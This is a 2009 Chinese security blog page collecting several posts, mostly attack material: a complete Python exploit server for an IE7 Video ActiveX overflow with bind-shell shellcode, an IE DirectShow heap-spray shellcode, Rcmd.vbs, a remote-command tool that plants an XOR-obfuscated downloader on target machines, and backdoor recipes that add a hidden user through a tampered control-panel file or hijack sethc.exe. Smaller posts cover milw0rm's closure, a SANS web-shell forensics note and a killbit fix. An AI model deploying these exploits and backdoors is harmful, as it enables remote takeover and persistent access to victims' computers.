鬼仔's Blog

MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit

鬼仔 — Fri, 10 Jul 2009 09:26:52 +0000

milw0rm.com [2009-07-10]

#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) #
###############################################################################

# #
# Tested on Windows 2003 SP2 R2, XPSP3 IE7 #
# #
# Written by SecureState R&D Team #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
#
#
# It's somewhat unreliable, can crash IE at times, found it to be around a 60%
# hit.
#
# This exploit is publicly being exploited in the wild, opted to release this
# to the research community. Microsoft is aware of the vulnerability.
#
###############################################################################
#
#
# [-] Exploit sent... [-]
# [-] Wait about 30 seconds and attempt to connect.[-]
# [-]telnet/nc to IP Address: 10.211.55.140 and port 5500 [-]
#
# relik@sslinuxvm1:~$ telnet 10.211.55.140 5500
# Trying 10.211.55.140...
# Connected to 10.211.55.140.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys,binascii
try:
import psyco
psyco.full()
except ImportError:
pass
class myRequestHandler(BaseHTTPRequestHandler):
try:
def do_GET(self):
# Always Accept GET
self.printCustomHTTPResponse(200)
# Site root: Main Menu
if self.path == "/ohn0es.jpg":
unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00")
self.wfile.write(unhex)
if self.path == "/":
target=self.client_address[0]
self.wfile.write("""""")
self.wfile.write("""
// Javascript code taken from multiple exploits and exploits that are being actively exploited in the wild

""")
self.wfile.write("""MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890)""")
self.wfile.write("""

Exploit is running...

""")
print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-]telnet/nc to IP Address: %s and port 5500 [-]" % (target))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
self.send_header("Content-type", "text/html")
self.send_header("Server", "myRequestHandler")
self.end_headers()

# In case of exceptions, pass them
except Exception:
pass

httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
###################################################################################

# MS Internet Explorer 7 Video ActiveX Exploit (Advisory 972890) #
###################################################################################
# #
# Tested on Windows 2003 SP2 R2, WinXPSP3 #
# #
# Written by SecureState R&D Team #
# http://www.securestate.com #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
# It's somewhat unreliable, can crash IE at times, found it to be around a 60% #
# hit. #
# #
# This exploit is publicly being exploited in the wild, opted to release this #
# to the research community. Microsoft is aware of the vulnerability #
# (Advisory 972890). #
# #
###################################################################################
""")
print ("[-] Starting MS Internet Explorer 7 Video ActiveX Exploit:80 [-]")
print ("[-] Have someone connect to you on port 80 [-]")
print ("Type -c to exit..")
try:
# handle the connections
httpd.handle_request()
# Serve HTTP server forever
httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
print ("\n\nExiting exploit...\n\n")
sys.exit()

发表评论 | 分类：技术文章

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/3218.html

SEBUG 开源

鬼仔 — Thu, 09 Jul 2009 10:56:01 +0000

作者： amxku

Info:sebug Information Management System
Author:amxku@sebug.net
http://sebug.net
http://wolfexp.net
http://huaidan.org

sebug.net的建立离不开一些朋友和组织的帮助,在此对他们表示感谢!
如果有什么漏洞，也请大家高抬贵手。谢谢。如果有什么好的建议，我们很欢迎。

同时也希望有志同道合的朋友能一起来运营这个站点。

======================================================================
├─forumdata
│ ├─backup //数据备份目录
│ ├─lang //言语文件目录
│ ├─sebug_cache //数据目录
│ ├─templates //模板
│ │ ├─admin //后台模板
│ │ └─default //前台模板
│ └─templates_c
├─image //后台程序文件
├─images //图片文件
│ ├─perate_img
│ └─sponsors
└─include //程序文件
├─Chart
├─class
├─func
└─jscript

后台是/admin.php
用户名和密码大家自己在admin.php里面自己改改吧。32位md5。

$admin['name'] = 'admin';
$admin['pass'] = '21232f297a57a5a743894a0e4a801fc3';

大家自己捣鼓吧!

======================================================================

已经都共享了，就留点版权吧
虽然不是什么好东西，但是也请尊重下作者的劳动吧

======================================================================

1、说点什么

本站点的建立离不开一些朋友和组织的帮助,在此对他们表示感谢!
我们着眼于网络安全的学习和探讨,之所以开发SEBUG Security vulnerability Database是为了更方便的管理与收集国内外网络安全缺陷以及漏洞资料。如果您有任何问题和意见，请直接与我们联系s1 [at] sebug.net ,再次感谢您的支持!

2、结构
a、搜索
请在文本框内输入您要搜索的程序名称或是SSV ID,搜索该程序出现的各种漏洞，本系统暂不支持多关键词等逻辑功能。

b、信息上报
本系统提供了上报模块 [点击上报] ，需注册用户后才能提交上报信息，应选择信息类别[Exploits，Vulnerabilities]。其中（*）部分必须填写。在提交后，系统审计人员会对信息进行审核，在通过审核后，该信息才会显示在数据库中。

c、RSS输出
[RSS Mirror_1], [RSS Mirror_2] , 提供RSS输出。

d、Javascript调用
[Javascript] , 提供JS调用。

e、网站地图
[SiteMap] , 网站地图。

3、发展历程
2006年08月01日，SEBUG开始筹备阶段。
2006年08月13日，sebug.net 域名正式注册生效。
2006年08月18日，Bug Exp Search @BETA版发布。内容以管理与收集国内外网络安全缺陷以及漏洞资料为主。
2006年10月25日，SEBUG正式版发布。网站再次进行外观上的大改版，优化整理了部分代码，修补了若干安全隐患。
2007年7月，Bug Exp Search 正式更名为安全漏洞信息库[SEBUG Security vulnerability Database]，简称 SSVDB。
2008年6月，SSVDB Forums 上线，信息安全技术交流平台，以讨论安全服务及其相关标准为主。
2008年7月，开始有更多的朋友关注和支持，SEBUG安全数据库重新整理了部分代码。数据库已达到10800余条记录。
2008年8月，“SEBUG Security vulnerability Database”很荣幸被国内知名杂志“黑客手册”采访，并且刊登封面。杂志详细的报道和介绍“SEBUG Security vulnerability Database”核心成员以及“SEBUG Security vulnerability Database”的发展史。
2008年10月，站点改版，从脚本到数据库都进行了重新设计。这次改版从形式到内容，都将是一个比较大的飞跃，站点有了很强的可扩展性。
2009年01月，关闭了SSVDB Forums。
2009年02月，启用了新的用户管理系统，沿用了以前的用户数据库。
2009年04月，重新整理了数据库结构。
2009年05月，添加appdir模块，更新数据库及网站架构。

4、感谢曾经对SEBUG做出贡献的人员(乱序)
4ngle、鬼仔、枫三少、王洁、Neeao、CDNunion、hqlong

5、声明
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

SEBUG开源是为了更好的发展，from the internet.for the internet 。

大小: 312615 字节
修改时间: 2009年7月9日, 18:30:29
MD5: 38822BDC1E2E27A44D933234F0E42271
SHA1: C159FE37A13A41ED78761806126130E88484D644
CRC32: 8E0ECF01

下载地址：http://down.chinaz.com/soft/25793.htm

备份

发表评论 | 分类：业界资讯

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/3217.html

Rcmd.vbs 1.01修正版

鬼仔 — Thu, 09 Jul 2009 02:38:22 +0000

作者：lcx

原来是NP写的，代码在这里

我修正了几个小bug。加了一个在对方机器上直接生成一个down.vbs，用来下载用。这个down.vbs的用法看这里：

代码：

On Error Resume Next
Set outstreem=Wscript.stdout
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Wscript.Quit
End If

If Wscript.arguments.Count<4 Then
Wscript.echo "Not enough Parameters."
usage()
Wscript.Quit
End If
ip=Wscript.arguments(0)
username=Wscript.arguments(1)
password=Wscript.arguments(2)
CmdStr=Wscript.arguments(3)
EchoStr=Wscript.arguments(4)
'downstr=Wscript.arguments(5)
foldername="c:\\windows\\temp\\"

wsh.echo "Conneting "&ip&" ...."
Set objlocator=CreateObject("wbemscripting.swbemlocator")
Set objswbemservices=objlocator.connectserver(ip,"root/cimv2",username,password)
showerror(err.number)
Set Win_Process=objswbemservices.Get("Win32_ProcessStartup")
Set Hide_Windows=Win_Process.SpawnInstance_
Hide_Windows.ShowWindow=12
Set Rcmd=objswbemservices.Get("Win32_Process")
Set colFiles = objswbemservices.ExecQuery _
("Select * from CIM_Datafile Where Name = 'c:\\windows\\temp\\read.vbs'")
If colFiles.Count = 0 Then
wsh.echo "Not found read.vbs! Create Now!"
Create_read()

End If
If EchoStr = "0" Then
msg=Rcmd.create("cmd /c "&CmdStr,Null,Hide_Windows,intProcessID)
End if
If EchoStr = "1" Then
msg=Rcmd.create("cmd /c cscript %windir%\temp\read.vbs """&CmdStr&"""",Null,Hide_Windows,intProcessID)
End If

If EchoStr = "3" Then
Create_down()
End If

If msg = 0 Then
wsh.echo "Command success..."
Else
showerror(Err.Number)
End If

wsh.echo "Please Wait 3 Second ...."
wsh.sleep(3000)
Set StdOut = Wscript.StdOut
Set oReg=objlocator.connectserver(ip,"root/default",username,password).Get("stdregprov")
oReg.GetMultiStringValue &H80000002,"SOFTWARE\Clients","cmd" ,arrValues
wsh.echo String(79,"*")
wsh.echo cmdstr&Chr(13)&Chr(10)

For Each strValue In arrValues
StdOut.WriteLine strValue
Next
oReg.DeleteValue &H80000002,"SOFTWARE\Clients","cmd"

Sub Create_read()
RunYN =Rcmd.create("cmd /c echo set ws=WScript.CreateObject(^""WScript.Shell^"")> %windir%\temp\read.vbs"_
&"&&echo str=ws.Exec(^""cmd /c ^""^&wscript.arguments(0)).StdOut.ReadAll:set ws=nothing>> %windir%\temp\read.vbs"_
&"&&echo Set oReg=GetObject(^""winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv^"")>> %windir%\temp\read.vbs"_
&"&&echo oReg.SetMultiStringValue ^&H80000002,^""SOFTWARE\Clients^"",^""cmd^"",Array(str) >> %windir%\temp\read.vbs",Null,Hide_Windows,intProcessID)
If RunYN = 0 Then
wsh.echo "read.vbs Created!!!"
Else
showerror(Err.Number)
End If

End Sub

sub Create_down()
Rundw=Rcmd.create("cmd /c echo Function Decode(s,n):ns=Split(Mid(s,2,Len(s)-1)):For i=0 To UBound(ns):on error resume next:Decode=Decode^&Chr(CInt(ns(i)) Xor n):Next:End Function>%windir%\temp\down.vbs"_
&"&&echo Execute(Decode(^"" 26 9 18 31 8 21 19 18 92 15 29 10 25 58 21 16 25 84 26 21 16 25 18 29 17 25 80 15 8 14 85 113 118 113 118 92 92 92 92 92 15 25 8 92 29 24 19 24 30 47 8 14 25 29 17 92 65 92 63 14 25 29 8 25 51 30 22 25 31 8 84 94 61 56 51 56 62 94 92 90 92 94 82 94 92 90 92 94 47 8 14 25 29 17 94 85 113 118 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 40 5 12 25 65 92 77 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 51 12 25 18 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 11 14 21 8 25 92 15 8 14 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 47 29 10 25 40 19 58 21 16 25 92 26 21 16 25 18 29 17 25 80 78 113 118 92 92 92 92 92 29 24 19 24 30 47 8 14 25 29 17 82 63 16 19 15 25 113 118 113 118 25 18 24 92 26 9 18 31 8 21 19 18 113 118 113 118 91 83 83 42 62 -13695 -10347 -10282 -20072 -19531 -18814 -17020 -10566 -18291 -13631 113 118 58 9 18 31 8 21 19 18 92 49 9 16 8 21 62 5 8 25 40 19 62 21 18 29 14 5 84 49 9 16 8 21 62 5 8 25 85 113 118 113 118 92 92 92 92 92 56 21 17 92 46 47 80 92 48 49 9 16 8 21 62 5 8 25 80 92 62 21 18 29 14 5 113 118 92 92 92 92 92 63 19 18 15 8 92 29 24 48 19 18 27 42 29 14 62 21 18 29 14 5 92 65 92 78 76 73 113 118 92 92 92 92 92 47 25 8 92 46 47 92 65 92 63 14 25 29 8 25 51 30 22 25 31 8 84 94 61 56 51 56 62 82 46 25 31 19 14 24 15 25 8 94 85 113 118 92 92 92 92 92 48 49 9 16 8 21 62 5 8 25 92 65 92 48 25 18 62 84 49 9 16 8 21 62 5 8 25 85 113 118 92 92 92 92 92 53 26 92 48 49 9 16 8 21 62 5 8 25 66 76 92 40 20 25 18 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 58 21 25 16 24 15 82 61 12 12 25 18 24 92 94 17 62 21 18 29 14 5 94 80 92 29 24 48 19 18 27 42 29 14 62 21 18 29 14 5 80 92 48 49 9 16 8 21 62 5 8 25 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 51 12 25 18 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 61 24 24 50 25 11 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 84 94 17 62 21 18 29 14 5 94 85 82 61 12 12 25 18 24 63 20 9 18 23 92 49 9 16 8 21 62 5 8 25 92 90 92 63 20 14 62 84 76 85 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 46 47 82 41 12 24 29 8 25 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 62 21 18 29 14 5 92 65 92 46 47 84 94 17 62 21 18 29 14 5 94 85 82 59 25 8 63 20 9 18 23 84 48 49 9 16 8 21 62 5 8 25 85 113 118 92 92 92 92 92 57 18 24 92 53 26 113 118 92 92 92 92 92 49 9 16 8 21 62 5 8 25 40 19 62 21 18 29 14 5 92 65 92 62 21 18 29 14 5 113 118 113 118 57 18 24 92 58 9 18 31 8 21 19 18 113 118 113 118 113 118 26 9 18 31 8 21 19 18 92 25 4 25 31 84 85 113 118 92 92 92 92 92 113 118 92 92 92 92 92 91 83 83 -14659 -20046 -19311 -12657 113 118 92 92 92 92 92 19 18 92 25 14 14 19 14 92 14 25 15 9 17 25 92 50 25 4 8 113 118 92 92 92 92 92 47 25 8 92 29 14 27 15 92 65 92 43 47 31 14 21 12 8 82 61 14 27 9 17 25 18 8 15 113 118 21 26 92 29 14 27 15 82 63 19 9 18 8 92 65 92 76 92 8 20 25 18 113 118 92 92 92 92 92 43 47 31 14 21 12 8 82 57 31 20 19 92 94 41 15 29 27 25 70 92 63 47 31 14 21 12 8 92 24 19 11 18 82 10 30 15 92 9 14 16 92 31 70 32 77 82 25 4 25 94 113 118 92 92 92 92 92 43 47 31 14 21 12 8 82 45 9 21 8 92 77 113 118 92 92 92 92 92 25 18 24 92 53 26 113 118 92 92 92 92 92 92 24 21 17 92 24 29 8 29 80 8 80 23 23 80 26 21 16 25 18 29 17 25 80 15 15 113 118 92 92 92 92 92 47 25 8 92 49 29 21 16 77 92 65 92 63 14 25 29 8 25 51 30 22 25 31 8 84 94 63 56 51 82 49 25 15 15 29 27 25 94 85 113 118 92 92 92 92 92 49 29 21 16 77 82 63 14 25 29 8 25 49 52 40 49 48 62 19 24 5 92 29 14 27 15 82 53 8 25 17 84 76 85 92 80 79 77 92 113 118 91 49 29 21 16 77 82 63 14 25 29 8 25 49 52 40 49 48 62 19 24 5 92 94 31 70 32 4 4 4 32 16 31 4 82 25 4 25 81 12 26 82 20 8 17 94 80 79 77 113 118 92 92 92 92 92 15 15 65 92 49 29 21 16 77 82 52 40 49 48 62 19 24 5 113 118 92 92 92 92 92 47 25 8 92 49 29 21 16 77 65 18 19 8 20 21 18 27 92 92 113 118 113 118 92 92 92 113 118 113 118 92 92 92 92 92 91 83 83 -19009 -19007 -13695 -16735 113 118 92 92 92 92 92 24 29 8 29 92 92 92 92 92 92 92 92 92 92 92 92 92 65 92 15 15 113 118 92 92 92 92 92 91 83 83 -19009 -19007 -12616 -17278 -15481 113 118 92 92 92 92 92 26 21 16 25 18 29 17 25 92 92 92 92 92 65 92 29 14 27 15 82 53 8 25 17 84 77 85 113 118 113 118 92 92 92 92 92 91 83 83 -19009 -19007 -13695 -16735 -19496 -18764 113 118 92 92 92 92 92 92 92 92 92 9 92 65 92 16 25 18 84 24 29 8 29 85 113 118 92 92 92 92 92 113 118 92 92 92 92 92 91 83 83 -17523 -19009 -12616 -17278 -13695 -10347 113 118 92 92 92 92 92 26 19 14 92 21 65 77 92 8 19 92 9 92 15 8 25 12 92 78 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 8 92 65 92 17 21 24 84 24 29 8 29 80 21 80 78 85 113 118 92 92 92 92 92 92 92 92 92 92 92 92 92 23 23 92 65 92 23 23 92 90 92 63 20 14 62 84 31 16 18 27 84 94 90 52 94 92 90 92 8 85 85 113 118 92 92 92 92 92 18 25 4 8 113 118 113 118 92 92 92 92 92 91 83 83 -10282 -20072 -19531 -18814 -17020 -10566 -18291 -13631 113 118 92 92 92 92 92 24 29 8 29 61 14 14 5 92 65 92 49 9 16 8 21 62 5 8 25 40 19 62 21 18 29 14 5 84 23 23 85 113 118 92 92 92 92 92 113 118 92 92 92 92 92 91 83 83 -20001 -19302 -12616 -17278 92 92 92 92 92 113 118 92 92 92 92 92 15 29 10 25 58 21 16 25 92 26 21 16 25 18 29 17 25 80 24 29 8 29 61 14 14 5 113 118 113 118 92 92 92 92 113 118 92 92 92 92 25 18 24 92 26 9 18 31 8 21 19 18 113 118 113 118 25 4 25 31 84 85 113 118 92 113 118 113 118^"",124))>>%windir%\temp\down.vbs",Null,Hide_Windows,intProcessID)

If Rundw = 0 Then
wsh.echo "down.vbs Created!!!"
Else
showerror(Err.Number)
End If

End Sub

Function showerror(errornumber)
If errornumber Then
wsh.echo "Error 0x"&CStr(Hex(Err.Number))&" ."
If Err.Description <> "" Then
wsh.echo "Error Description: "&Err.Description&"."
End If
Wscript.Quit
Else
outstreem.Write "."
End If
End Function
Sub usage()
wsh.echo string(79,"*")
wsh.echo "Rcmd v1.01 by NetPatch modiy by lcx"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptfullname&" targetIP username password ""Command"" 1 //on echo"
wsh.echo "cscript "&wscript.scriptfullname&" targetIP username password ""Command"" 0 //off echo create "
wsh.echo "cscript "&wscript.scriptfullname&" targetIP username password """" 3 // create cdo.message.down.vbs "
wsh.echo string(79,"*")&vbcrlf
end Sub

下载：冰点论坛

鬼仔ps：备份

发表评论 | 分类：技术文章

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/3215.html

milw0rm 关闭了

鬼仔 — Wed, 08 Jul 2009 16:06:16 +0000

update（2009-7-9 22:46）：milw0rm 现在又开了，不知道为什么，欺骗感情啊，原来的公告没了，投递也又开放了，没有任何说明，在 str0ke 的 twitter 上有这么一条（43分钟前发的）：

milw0rm's back up & posting will start once again, I can't let all of the emails in my submit box to just sit there.43 minutes ago from web

ps：刚才更新过，说又开放了，结果现在又打不开了，不知道在做什么。
--------------------------------------------------------

上午看到 milw0rm.com 首页的 banner 位置这样写着：

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke

投递也关闭了：

submissions are closed.

当时还想着把全站抓下来保存一份，结果刚才发现已经打不开了，应该是已经关闭了，非常非常可惜，这么一个站就这样关闭了。。。

最后贴几张图当作留念吧。

banner：

favicon：

首页的最后截图（快照中抓取的）：

群里有人说可能跟前段时间在 milw0rm 上公布的那个 Lxadmin（现在的 kloxo）的 exp 有关，当时那个 exp 使很多站被黑，数据被清空，最后导致 Lxadmin 的作者 Ligesh 自杀。

ps：有没有把 milw0rm 全站抓回来的朋友？希望能给大家共享下，谢谢了。

发表评论 | 分类：业界资讯

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/3213.html

Sun One WebServer 6.1 JSP Source Viewing vulnerability

鬼仔 — Mon, 06 Jul 2009 06:32:06 +0000

作者：Kingcope Kingcope <kcope2_(at)_googlemail.com>

Sun One WebServer 6.1 JSP Source Viewing vulnerability

System: Sun-ONE-Web-Server/6.1, Windows Server 2003

SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose
JSP Source code.

A normal URL would look like:

http://server/hello.jsp

To disclose the contents including source code of a JSP file:

http://server/hello.jsp::$DATA

Best Regards,

Nikolaos Rangos

More on ColdFusion hacks

鬼仔 — Mon, 06 Jul 2009 06:13:03 +0000

来源：http://isc.sans.org/diary.html?storyid=6730

Thanks to our reader Adam we received some additional information regarding recent ColdFusion hacks.
As I wrote in the previous diary (http://isc.sans.org/diary.html?storyid=6715), the attackers are exploiting vulnerable FCKEditor installations, which come enabled by default with ColdFusion 8.0.1 as well as some other ColdFusion packages.

The first thing the attackers do is uploading a ColdFusion web shell – a script very similar to ASP.NET or PHP web shells we've been writing so much about. The web shell I analyzed is very powerful and seems to be recent – according to the date in the script it was released on the 23rd of June by a Chinese hacker "Seraph".

The script has a simple authentication mechanism – it verifies what the URL parameter "action" is set to, as can be seen in the screenshot below:

If the parameter "action" is set to "seraph", the user can access the web site, otherwise the script just prints back "seraph". In other words, the URL the attacker accesses after uploading the script will look something like this: http://www.hacked.site/uploaded_file.cfm?action=seraph

A nice thing (for us doing forensics, at least) is that you can now grep through your logs for "action=seraph" to see if you have been hacked with the same script. Keep in mind that this is not a definite test, of course, since the action variable's name can be easily modified.

测试版下载：cfm.txt

Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit

鬼仔 — Sun, 05 Jul 2009 16:36:57 +0000

来源：Xeye

Microsoft DirectShow存在可被远程利用的堆栈溢出漏洞。

关键代码如下：
-------------------------以下内容有危险，仅为研究使用--------------

var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
"%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +
"%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +
"%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +
"%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +
"%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +
"%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +
"%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +
"%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +
"%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +
"%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +
"%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +
"%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +
"%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +
"%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +
"%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +
"%u6363%u5251%u634c%u5553%u4550");
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length


-------------------------------------
该shellcode会执行calc。
感谢代码分享者：咖啡。
感谢漏洞遗失者：~这里是马赛克~

发表评论 | 分类：工具收集



© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/3204.html
	相关日志
	
	DirectShow 0DAY第二波警告 (3)
	关于FLASH ODAY的修改方法 (6)
	MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day　网马生成器 (0)
	Flash 0day生成器 (14)
	FLASH 0DAY 详细分析和总结 (0)



DirectShow 0DAY第二波警告
鬼仔 — Sun, 05 Jul 2009 16:33:29 +0000
来源：80SEC非官方八卦BLOG
漏洞攻击形势：
DirectShow 0DAY第二波爆发！！该漏洞在国内已经呈大规模爆发形势。至少有几千网站被挂上了该漏洞的网页木马！
漏洞攻击细节：
与第一波的DirectShow 0DAY 不同，这次的漏洞是DirectShow相关msvidctl.dll组件解析畸形MPEG2视频格式文件触发溢出，攻击者可以使用普通的javascript堆喷射方式远程执行任意代码。


漏洞来源：http://news.baike.360.cn/3451604/27274290.html
漏洞临时解决方法：
-------------------KillBit相关组件,将下面的内容保存为.reg文件双击即可.-------------------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

发表评论 | 分类：业界资讯



© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/3203.html
	相关日志
	
	Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit (9)
	针对最近的那个DirectShow 0day的临时安全设置 (5)
	网马漏洞CLSID大全 (0)
	关于FLASH ODAY的修改方法 (6)
	MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day　网马生成器 (0)








利用cpl文件在xp中留一个后门
鬼仔 — Thu, 02 Jul 2009 10:11:56 +0000
# 鬼仔：为了不让首页截断部分出现图片，因为把图片位置换了下，不知道lcx会不会介意。
作者：lcx
这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么？是不是很吃惊，原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然，微软的好多组 件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因，它牵涉太多了，就算是反垄断法也不可能让微软删掉ie的。


看到图中的那个NUSRMGR.HTA文件了吗？我们可以用它来做下手脚（当然你选别的js文件也是可以的）

我们在里边加几行js语句：
var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)
当然你加下载者更好，我只是做个示例。
然后：
echo y|copy nusrmgr.cpl c:\windows\system32\dllcache\nusrmgr.cpl
echo y|copy nusrmgr.cpl c:\windows\system32\nusrmgr.cpl
替换原来的文件。这样以后用户再调用控制面板里的“用户帐户”选项后，就会自动给你加一个帐户了。
这算是一个思路了，应当很鸡肋。如果要完美一点，可以查看一下别的cpl文件如何更改，如何无声无息的替掉原来的文件(如镜像劫持)。

发表评论 | 分类：技术文章



© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/3202.html
	相关日志
	
	打造XP下可运行的微型PE文件（292字节） (1)
	巧妙利用.mdb后缀数据库做后门 (0)
	后门新思路 (0)
	冰河暗涌防不胜防 BIOS下实现的Telnet后门 (4)
	xp下双开3389源码 (5)








vbs创建注册表项
鬼仔 — Thu, 02 Jul 2009 10:06:44 +0000
作者：lcx
利用vbs创建注册表值较简单，创建注册表项的话，网上多是用wmi来，例如代码：
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"  ‘创建sethc.exe项
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

难道WshShell 对象的RegWrite 方法真的不可以吗？我仔细研究了一下，只需要在要加入的项后加\就可以，例如
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\","","REG_SZ"
所以我们创建shift后门的话，两句话就可以。
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\cmd.exe","REG_SZ"

发表评论 | 分类：技术文章



© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址：http://huaidan.org/archives/3200.html
	相关日志
	
	非常规运行vbs (0)
	隐藏注册表键代码 (0)
	输入小助手.vbs (2)
	跟踪劫持execute解密VBS乱码 (0)
	谈VBS在Hacking中的作用之二 (0)